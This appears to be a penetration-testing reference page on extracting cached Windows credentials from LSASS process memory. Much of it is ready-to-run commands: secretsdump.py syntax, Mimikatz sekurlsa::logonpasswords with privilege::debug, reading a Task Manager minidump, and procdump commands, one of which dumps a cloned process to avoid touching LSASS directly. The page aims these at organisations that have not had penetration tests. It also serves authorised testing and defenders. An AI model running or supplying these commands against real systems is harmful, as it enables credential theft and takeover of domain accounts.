LSASS Credentials
The Local Security Authority Subsystem Service (LSASS) process manages various security-related functions in Windows, such as user authentication.
When a domain user performs an interactive logon (physically or via RDP) to a computer, the user's credentials get cached in the LSASS Process in order to use Single Sign-On (SSO) when network logon is required to access services on the domain.
To access LSASS Process memory to extract credentials, you must have a user account with SeDebugPrivilege to the target Windows computer. Most of the time, this means that you have access to an account with local administrator privileges to the computer.
There are many, many tools and research on ways an attacker can dump the LSASS process. Dumping LSASS is a much larger topic than what is mentioned here, especially once you look into protections against LSASS dumping and evading EDR.
Regardless, below are a few popular methods that may work on organizations that may not have executed any penetration tests.
secretsdump.py <domain/>[username]<:password><@computer> <options>
OPTIONS
-outputfile Base Output Filename
-hashes Authenticate Using LMHASH:NTHASH
-k Use Kerberos Auth From ccache File## Run Mimikatz
mimikatz.exe
## Enable SeDebugPrivilege In Your Terminal
privilege::debug
## Dump LSASS Memory
sekurlsa::logonpasswordsYou can create a minidump of the lsass.exe process using the Task Manager running as administrator. Simply locate lsass.exe, right-click on it, and select Create Dump File. We can then use Mimikatz to read the dump.
## Switch Mimikatz context to the lsass.exe dump
sekurlsa::minidump [path to lsass dump]
## Dump Contents Of LSASS Dump
sekurlsa::logonpasswords## Dump LSASS Process
procdump.exe -accepteula -ma lsass.exe lsass.dmp
## Avoid Reading LSASS By Dumping Cloned LSASS Process
procdump.exe -accepteula -r -ma lsass.exe lsass.dmLast updated